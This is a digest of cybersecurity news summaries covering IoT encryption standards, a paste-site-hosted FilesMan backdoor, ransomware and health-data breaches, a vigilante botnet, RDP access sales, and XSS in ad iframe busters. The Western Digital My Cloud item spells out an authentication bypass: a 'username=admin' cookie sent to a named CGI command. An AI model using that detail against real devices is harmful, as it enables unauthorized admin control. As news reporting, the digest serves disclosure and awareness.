• Can Lightweight Encryption Save Us from the Internet of Things?
    Imagine if fire could be hacked and controlled, just like the current generation of IoT devices. What makes each IoT device special is also what makes it vulnerable. But it has taken this long, and several workshops, to get the Lightweight Cryptographic Project to a point where we can almost start deploying the kinds of protection that IoT needs, and that we need from our IoT. NIST is trying to pull them together and develop a standard that is easily implementable for most new IoT devices. They include attack resistance, cost considerations, the performance of the device once encryption is added, the ability to use the standard in all IoT devices including those deployed in operational technology, and the suitability of the new protection for use with both hardware and software IoT. As a government project, perhaps IoT encryption is not as exciting as going to the moon or Mars, but it’s something that is sorely needed as we continue to deploy billions and billions more unprotected sensors and devices.Read More
  • Paste Site Used as Hosting Service for FilesMan Backdoor
    Bruno Zanelato found a website backdoor which, unlike other siblings of its family, does not embed its code within a web page but it loads it from an online clipboard service. Website backdoors are specially devised malicious tools hidden within a website's code and designed to allow an attacker to reinfect the target and retain control even after the site has been cleaned. Most malware tailored for websites and added to a web page's code use obfuscation techniques to prevent website owners from discovering the true purpose and goal of the hidden code. However, as described in Zanelato's blog post, the unusual backdoor he discovered does not try to hide in plain sight within the pages of the target website like many of its counterparts. The code listed below will download the backdoor which will then grab the malware designed to allow the website attacker to reinfect the website at a later date. Once decrypted, the contents of the downloaded malicious payload revealed that the "minimalist" backdoor is the FilesMan malware which enables threat actors to gain access, modify and reinfect websites at any time post-infection.Read More
  • No personal info lost in ransomware attack, says VON Canada
    VON's computer systems in Nova Scotia and Ontario were affected by the cyber attack. (Pixabay)VON Canada is assuring clients and staff that their information is safe after the nursing organization was the target of a ransomware incident earlier this month. Ransomware is a malicious software program designed to hold a computer system hostage, blocking access until money is paid. The Victorian Order of Nurses said in a statement on its website that it has not paid out any ransom. "There is no evidence at this time to indicate that any employee, client or volunteer information was compromised in any way," the statement read. The organization said it discovered the problem Sept. 1, and immediately shut down all its computer systems to make sure its network and user data stayed secure. VON's phone and email systems were included in the shutdown, which led to some delays and missed appointments.VON said it went to "manual operations" for scheduling care and client information.Read More
  • 'I am admin' bug turns WD's My Cloud boxes into Everyone's Cloud
    Miscreants can potentially gain admin-level control over Western Digital's My Cloud gear via an HTTP request over the network or internet. Researchers at infosec shop Securify revealed today the vulnerability, designated CVE-2018-17153, which allows an unauthenticated attacker with network access to the device to bypass password checks and login with admin privileges. According to Securify, the flaw itself lies in the way My Cloud creates admin sessions that are attached to an IP address. When an attacker sends a command to the device's web interface, as an HTTP CGI request, they can also include the cookie username=admin – which unlocks admin access. Thus if properly constructed, the request would establish an admin login session to the device without ever asking for a password. "The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1," Securify explained.Read More
  • Blue Cross and Blue Shield of Rhode Island and Independence Blue Cross report breaches
    Blue Cross and Blue Shield of Rhode Island (BCBSRI) is blaming a vendor for a breach that compromised the personal health information of 1,567 people and Philadelphia-based Insurer Independence Blue Cross was breached in a separate incident. The unnamed vendor reportedly sent the member benefits explanations, also known as health-care services summaries, to the wrong BCBSRI member in the same household or on the same family policy, according to the Providence Journal. Read more The mistake stemmed from Blue Cross’ use of a vendor “to combine healthcare service summaries for some members who were covered on the same policy in an effort to reduce the number of summaries members received. In mid-July, BCBSRI learned that in some instances, the summaries were being combined incorrectly by the vendor, resulting in summaries being sent to the wrong family member or other person covered on their family policy,” the report said. The firm emphasized that no information was disclosed to anyone other than a family member or a person covered on the same family policy.Read More
  • A vigilante botnet is taking out crypto-jacking malware
    A new botnet is on the rise but it isn't being used to take down websites or hack servers, it's going after crypto-jacking malware. When it discovers the malware on a website, it takes it over before destroying them both. Known as Fbot, the botnet scans websites for a specific piece of mining malware and when it finds it, the botnet takes over the nefarious software and then destroys itself, taking the malware with it. Typically, the malware is installed via a malicious download or infected website and forces the system it’s attached to mine cryptocurrency. As of now, the creators of Fbot remain as unknown as the developers of the crypto-jacking malware it targets, but their efforts appear admirable. The researchers who discovered the botnet, Qihoo360Netlab, claim that there appear to be links between this botnet and the Satori botnet which has in the past been used to infect mining hardware.Read More
  • RDP Ports Prove Hot Commodities on the Dark Web
    Most of the time, RDP is used for legitimate remote administration: when companies outsource IT, or remote admins have to access a colleague's machine, they most commonly use RDP to connect to it. There are many actions a threat actor can take with RDP access (credential harvesting, account takeover, cryptocurrency mining among them) and it's easier for them to launch these threats if they have access to an RDP port. Still, many threat actors of all skill levels buy RDP access on the Dark Web, where the ports are hot commodities, as are tools to delete attackers' activity once their work is done. Once they have RDP credentials, an attacker can use their access to launch several attacks. Less skilled attackers are more likely to purchase bulk RDP access on the Dark Web, Wisniewski adds, because they lack expertise to find open ports. Breaching networks and servers via RDP ports remains of great interest to cybercriminals, according to Flashpoint, and there is a clear trend toward automating the process of detecting exposed RDP targets and brute-forcing access.Read More
  • EPAM Systems Partners Positive on Cybersecurity Research Lab
    EPAM Systems, Inc. EPAM recently announced that it has joined forces with cybersecurity consulting and research firm Positive on a Cybersecurity R&D Lab dedicated to research in security solutions and services. EPAM Systems, Inc. Revenue (TTM) | EPAM Systems, Inc. Quote With enterprises realizing the need for stricter security measures, EPAM and Positive’s combined research infrastructure is expected to aptly serve the purpose. Companies are expected to further increase spending on cyber security, including intensive research, which is necessary to come up with sounder and stricter measures to combat security breaches, and EPAM seems to cash in on this opportunity. EPAM currently has a Zacks Rank #3 (Hold). EPAM Systems, Inc. (EPAM) : Free Stock Analysis ReportRead More
  • Expandable ads can be entry points for site hacks
    The researcher says he identified several vulnerabilities in iframe busters --the name given to files that websites host on their server to support "expanded ads." Advertising companies provide these iframe busters to site owners who want to show ads from the ad network's portfolio. Westergren says that many of these iframe buster scripts are vulnerable to cross-site request (XSS) vulnerabilities that allow an attacker to take advantage of the iframe buster file hosted on a site's server to run malicious JavaScript code on that site. The researcher says he identified XSS vulnerabilities in most of the iframe buster scripts that, until recently, Google has been providing for download as part of a multi-vendor iFrame Buster kit, offered through the DoubleClick AdExchange documentation site. Westergren detailed four examples on his blog, showing how an attacker could run malicious code on any site that uses iframe busters from ad networks like Adform, Eyeblaster (Add in Eye), Adtech, and Jivox.Read More
  • INTERPOL-Europol conference calls for global response to cybercrime
    With cybercriminals using increasingly sophisticated methods and technologies to carry out their illicit activities, the 6th INTERPOL-Europol Cybercrime Conference will focus on the most pressing cyberthreats today and in the future, from attacks against the financial and government sectors and the rise of ‘cybercrime as a service’ to denial of service attacks and business e-mail compromise scams. Under the theme of ‘Globalized efforts to tackle cybercrime’, the three-day (18 – 20 September) conference will look at ways in which stakeholders from all sectors can combine their expertise to make the internet a more secure environment. Key areas of discussion will include developing actionable cyberthreat intelligence, identifying cybercriminals through their online behaviour, defining the role of digital forensics, implementing national and regional legislations to tackle cybercrime, and crisis response planning.Read More